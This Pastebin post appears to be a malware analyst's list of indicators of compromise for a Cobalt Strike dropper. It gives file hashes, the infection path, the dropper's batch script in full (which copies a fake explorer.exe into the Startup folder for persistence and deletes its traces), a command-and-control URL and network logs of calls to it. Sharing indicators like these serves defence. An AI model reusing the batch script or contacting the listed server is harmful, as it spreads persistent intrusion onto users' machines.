SHARE
TWEET

#cobaltstrike_210319

VRad Mar 22nd, 2019 (edited) 270 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #cobaltstrike #SFX #BAT
  2.  
  3. https://pastebin.com/hbxkBA9n
  4.  
  5. FAQ:
  6. https://www.cobaltstrike.com/features
  7. https://www.youtube.com/watch?v=rqOG_oyYbvs
  8. https://pypi.org/project/pyconfig/
  9. https://blog.cobaltstrike.com/2014/06/12/cobalt-strike-innovative-offense-or-just-a-gui/
  10.  
  11. attack_vector
  12. --------------
  13. EXE (SFX) > .bat > Startup\explorer.exe
  14.  
  15. email_headers
  16. --------------
  17. n/a
  18.  
  19. files
  20. --------------
  21. SHA-256     fb7f4162ee59ee2b23606bb50c560a8010df95d3746c79b13f8200de05e934ad
  22. File name   explorer.exe
  23. File size   4.58 MB (4797547 bytes)
  24.  
  25. SHA-256     1acb5b19209c8b11aceb40b5d5da4a53505f1180bd0e0ea1886c8b8159af35b1
  26. File name   Nd9q
  27. File size   205.09 KB (210011 bytes)
  28.  
  29. SHA-256     2f16567c59e964e2eb583a1aa749a08255db10685b087b2dffc154d165f4f4e9
  30. File name   pyconfig.h
  31. File size   21.31 KB (21821 bytes)
  32.  
  33. SHA-256     ce559f72bf1fc7b72f3db4b814320d3902f607098c06141901277a07976b59f7
  34. File name   python34.dll
  35. File size   2.62 MB (2744832 bytes)
  36.  
  37. activity
  38. **************
  39.  
  40. bat_file
  41. --------------
  42. @echo off
  43. copy explorer.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
  44. cd "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
  45. start explorer.exe
  46. cd %~dp0
  47. del 1.rar.exe
  48. del explorer.exe
  49. del link_site.bat
  50. exit
  51.  
  52. C2:
  53. http://185.25.50.168:4444/Nd9q
  54.  
  55. netwrk
  56. --------------
  57. 185.25.50.168   185.25.50.168:4444  GET /Nd9q HTTP/1.1  Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)
  58. 185.25.50.168   185.25.50.168:4444  GET /cx HTTP/1.1    Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;)
  59. 185.25.50.168   185.25.50.168:4444  GET /cx HTTP/1.1    Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;)
  60.  
  61. comp
  62. --------------
  63. explorer.exe    1236    TCP localhost   50093   185.25.50.168   4444    CLOSE_WAIT
  64.  
  65. proc
  66. --------------
  67. C:\Windows\system32\cmd.exe cmd /c ""C:\Users\operator\Desktop\1\link_site.bat" "
  68. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe
  69. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe
  70.  
  71. persist
  72. --------------
  73. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup             19.03.2019 15:59   
  74. explorer.exe           
  75. c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\explorer.exe        01.01.1970 2:00
  76.  
  77. drop
  78. --------------
  79. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe
  80.  
  81. %temp%\_MEI22402\Include\pyconfig.h
  82. %temp%\_MEI22402\python34.dll
  83. %temp%\_MEI22402\MSVCR100.dll
  84. %temp%\_MEI22402\_ssl.pyd
  85. %temp%\_MEI22402\_socket.pyd
  86. %temp%\_MEI22402\unicodedata.pyd
  87. %temp%\_MEI22402\unicodedata.pyd
  88. %temp%\_MEI22402\...
  89.  
  90. # # #
  91.  
  92. VR
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top